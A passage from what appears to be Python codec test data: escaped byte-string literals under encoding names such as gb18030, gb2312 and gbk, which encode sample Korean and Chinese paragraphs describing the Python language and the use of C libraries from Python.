"\xbe\xa4\xc8\xa4\xb2\xb4\xcf\xb4\xd9\x2e\x20\xa4\xd4\xa4\xb2\xa4"
"\xce\xa4\xaa\x2e\x20\xb1\xd7\xb7\xb1\xb0\xc5\x20\xa4\xd4\xa4\xb7"
"\xa4\xd1\xa4\xb4\xb4\xd9\x2e\x0a",
"\xe2\x97\x8e\x20\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\x28\x50\x79"
"\x74\x68\x6f\x6e\x29\xec\x9d\x80\x20\xeb\xb0\xb0\xec\x9a\xb0\xea"
"\xb8\xb0\x20\xec\x89\xbd\xea\xb3\xa0\x2c\x20\xea\xb0\x95\xeb\xa0"
"\xa5\xed\x95\x9c\x20\xed\x94\x84\xeb\xa1\x9c\xea\xb7\xb8\xeb\x9e"
"\x98\xeb\xb0\x8d\x20\xec\x96\xb8\xec\x96\xb4\xec\x9e\x85\xeb\x8b"
"\x88\xeb\x8b\xa4\x2e\x20\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\xec"
"\x9d\x80\x0a\xed\x9a\xa8\xec\x9c\xa8\xec\xa0\x81\xec\x9d\xb8\x20"
"\xea\xb3\xa0\xec\x88\x98\xec\xa4\x80\x20\xeb\x8d\xb0\xec\x9d\xb4"
"\xed\x84\xb0\x20\xea\xb5\xac\xec\xa1\xb0\xec\x99\x80\x20\xea\xb0"
"\x84\xeb\x8b\xa8\xed\x95\x98\xec\xa7\x80\xeb\xa7\x8c\x20\xed\x9a"
"\xa8\xec\x9c\xa8\xec\xa0\x81\xec\x9d\xb8\x20\xea\xb0\x9d\xec\xb2"
"\xb4\xec\xa7\x80\xed\x96\xa5\xed\x94\x84\xeb\xa1\x9c\xea\xb7\xb8"
"\xeb\x9e\x98\xeb\xb0\x8d\xec\x9d\x84\x0a\xec\xa7\x80\xec\x9b\x90"
"\xed\x95\xa9\xeb\x8b\x88\xeb\x8b\xa4\x2e\x20\xed\x8c\x8c\xec\x9d"
"\xb4\xec\x8d\xac\xec\x9d\x98\x20\xec\x9a\xb0\xec\x95\x84\x28\xe5"
"\x84\xaa\xe9\x9b\x85\x29\xed\x95\x9c\x20\xeb\xac\xb8\xeb\xb2\x95"
"\xea\xb3\xbc\x20\xeb\x8f\x99\xec\xa0\x81\x20\xed\x83\x80\xec\x9d"
"\xb4\xed\x95\x91\x2c\x20\xea\xb7\xb8\xeb\xa6\xac\xea\xb3\xa0\x20"
"\xec\x9d\xb8\xed\x84\xb0\xed\x94\x84\xeb\xa6\xac\xed\x8c\x85\x0a"
"\xed\x99\x98\xea\xb2\xbd\xec\x9d\x80\x20\xed\x8c\x8c\xec\x9d\xb4"
"\xec\x8d\xac\xec\x9d\x84\x20\xec\x8a\xa4\xed\x81\xac\xeb\xa6\xbd"
"\xed\x8c\x85\xea\xb3\xbc\x20\xec\x97\xac\xeb\x9f\xac\x20\xeb\xb6"
"\x84\xec\x95\xbc\xec\x97\x90\xec\x84\x9c\xec\x99\x80\x20\xeb\x8c"
"\x80\xeb\xb6\x80\xeb\xb6\x84\xec\x9d\x98\x20\xed\x94\x8c\xeb\x9e"
"\xab\xed\x8f\xbc\xec\x97\x90\xec\x84\x9c\xec\x9d\x98\x20\xeb\xb9"
"\xa0\xeb\xa5\xb8\x0a\xec\x95\xa0\xed\x94\x8c\xeb\xa6\xac\xec\xbc"
"\x80\xec\x9d\xb4\xec\x85\x98\x20\xea\xb0\x9c\xeb\xb0\x9c\xec\x9d"
"\x84\x20\xed\x95\xa0\x20\xec\x88\x98\x20\xec\x9e\x88\xeb\x8a\x94"
"\x20\xec\x9d\xb4\xec\x83\x81\xec\xa0\x81\xec\x9d\xb8\x20\xec\x96"
"\xb8\xec\x96\xb4\xeb\xa1\x9c\x20\xeb\xa7\x8c\xeb\x93\xa4\xec\x96"
"\xb4\xec\xa4\x8d\xeb\x8b\x88\xeb\x8b\xa4\x2e\x0a\x0a\xe2\x98\x86"
"\xec\xb2\xab\xea\xb0\x80\xeb\x81\x9d\x3a\x20\xeb\x82\xa0\xec\x95"
"\x84\xeb\x9d\xbc\x20\xec\x93\x94\xec\x93\x94\xec\x93\xa9\x7e\x20"
"\xeb\x8b\x81\xed\x81\xbc\x21\x20\xeb\x9c\xbd\xea\xb8\x88\xec\x97"
"\x86\xec\x9d\xb4\x20\xec\xa0\x84\xed\x99\xa5\xeb\x8b\x88\xeb\x8b"
"\xa4\x2e\x20\xeb\xb7\x81\x2e\x20\xea\xb7\xb8\xeb\x9f\xb0\xea\xb1"
"\xb0\x20\xec\x9d\x8e\xeb\x8b\xa4\x2e\x0a"),
'gb18030': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\xc8\xe7\xba\xce\xd4\xda\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xd6\xd0\xca\xb9\xd3\xc3\xbc\xc8\xd3\xd0\xb5\xc4\x20\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xa1\xa1\xd4\xda\xd9\x59\xd3"
"\x8d\xbf\xc6\xbc\xbc\xbf\xec\xcb\xd9\xb0\x6c\xd5\xb9\xb5\xc4\xbd"
"\xf1\xcc\xec\x2c\x20\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xdc"
"\x9b\xf3\x77\xb5\xc4\xcb\xd9\xb6\xc8\xca\xc7\xb2\xbb\xc8\xdd\xba"
"\xf6\xd2\x95\xb5\xc4\x0a\xd5\x6e\xee\x7d\x2e\x20\x9e\xe9\xbc\xd3"
"\xbf\xec\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xb5\xc4\xcb\xd9"
"\xb6\xc8\x2c\x20\xce\xd2\x82\x83\xb1\xe3\xb3\xa3\xcf\xa3\xcd\xfb"
"\xc4\xdc\xc0\xfb\xd3\xc3\xd2\xbb\xd0\xa9\xd2\xd1\xe9\x5f\xb0\x6c"
"\xba\xc3\xb5\xc4\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\x81\x4b"
"\xd3\xd0\xd2\xbb\x82\x80\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74"
"\x6f\x74\x79\x70\x69\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72"
"\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20"
"\xbf\xc9\x0a\xb9\xa9\xca\xb9\xd3\xc3\x2e\x20\xc4\xbf\xc7\xb0\xd3"
"\xd0\xd4\x53\xd4\x53\xb6\xe0\xb6\xe0\xb5\xc4\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xca\xc7\xd2\xd4\x20\x43\x20\x8c\x91\xb3\xc9\x2c"
"\x20\xb6\xf8\x20\x50\x79\x74\x68\x6f\x6e\x20\xca\xc7\xd2\xbb\x82"
"\x80\x0a\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69"
"\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e"
"\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xb9\xca\xce\xd2"
"\x82\x83\xcf\xa3\xcd\xfb\xc4\xdc\x8c\xa2\xbc\xc8\xd3\xd0\xb5\xc4"
"\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xc4\xc3\xb5\xbd\x20"
"\x50\x79\x74\x68\x6f\x6e\x20\xb5\xc4\xad\x68\xbe\xb3\xd6\xd0\x9c"
"\x79\xd4\x87\xbc\xb0\xd5\xfb\xba\xcf\x2e\x20\xc6\xe4\xd6\xd0\xd7"
"\xee\xd6\xf7\xd2\xaa\xd2\xb2\xca\xc7\xce\xd2\x82\x83\xcb\xf9\x0a"
"\xd2\xaa\xd3\x91\xd5\x93\xb5\xc4\x86\x96\xee\x7d\xbe\xcd\xca\xc7"
"\x3a\x0a\x83\x35\xc7\x31\x83\x33\x9a\x33\x83\x32\xb1\x31\x83\x33"
"\x95\x31\x20\x82\x37\xd1\x36\x83\x30\x8c\x34\x83\x36\x84\x33\x20"
"\x82\x38\x89\x35\x82\x38\xfb\x36\x83\x33\x95\x35\x20\x83\x33\xd5"
"\x31\x82\x39\x81\x35\x20\x83\x30\xfd\x39\x83\x33\x86\x30\x20\x83"
"\x34\xdc\x33\x83\x35\xf6\x37\x83\x35\x97\x35\x20\x83\x35\xf9\x35"
"\x83\x30\x91\x39\x82\x38\x83\x39\x82\x39\xfc\x33\x83\x30\xf0\x34"
"\x20\x83\x32\xeb\x39\x83\x32\xeb\x35\x82\x39\x83\x39\x2e\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\xe5"
"\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89\xe7"
"\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3\x80"
"\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a\x80"
"\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84\xe4"
"\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f\x8a"
"\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84\xe9"
"\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5\xbf"
"\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e\x20"
"\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc\xe5"
"\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5\xba"
"\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4\xb8"
"\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5\xbd"
"\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8\xa6"
"\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7\x94"
"\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1\xe8"
"\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf\xab"
"\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5\xb8"
"\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6\x8b"
"\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84\xe7"
"\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5\x8f"
"\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad\xe6"
"\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6\x88"
"\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8\xab"
"\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98\xaf"
"\x3a\x0a\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\xec\x9d\x80\x20\xea"
"\xb0\x95\xeb\xa0\xa5\xed\x95\x9c\x20\xea\xb8\xb0\xeb\x8a\xa5\xec"
"\x9d\x84\x20\xec\xa7\x80\xeb\x8b\x8c\x20\xeb\xb2\x94\xec\x9a\xa9"
"\x20\xec\xbb\xb4\xed\x93\xa8\xed\x84\xb0\x20\xed\x94\x84\xeb\xa1"
"\x9c\xea\xb7\xb8\xeb\x9e\x98\xeb\xb0\x8d\x20\xec\x96\xb8\xec\x96"
"\xb4\xeb\x8b\xa4\x2e\x0a\x0a"),
'gb2312': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\x0a"),
'gbk': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\xc8\xe7\xba\xce\xd4\xda\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xd6\xd0\xca\xb9\xd3\xc3\xbc\xc8\xd3\xd0\xb5\xc4\x20\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xa1\xa1\xd4\xda\xd9\x59\xd3"
"\x8d\xbf\xc6\xbc\xbc\xbf\xec\xcb\xd9\xb0\x6c\xd5\xb9\xb5\xc4\xbd"
"\xf1\xcc\xec\x2c\x20\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xdc"
"\x9b\xf3\x77\xb5\xc4\xcb\xd9\xb6\xc8\xca\xc7\xb2\xbb\xc8\xdd\xba"
"\xf6\xd2\x95\xb5\xc4\x0a\xd5\x6e\xee\x7d\x2e\x20\x9e\xe9\xbc\xd3"
"\xbf\xec\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xb5\xc4\xcb\xd9"
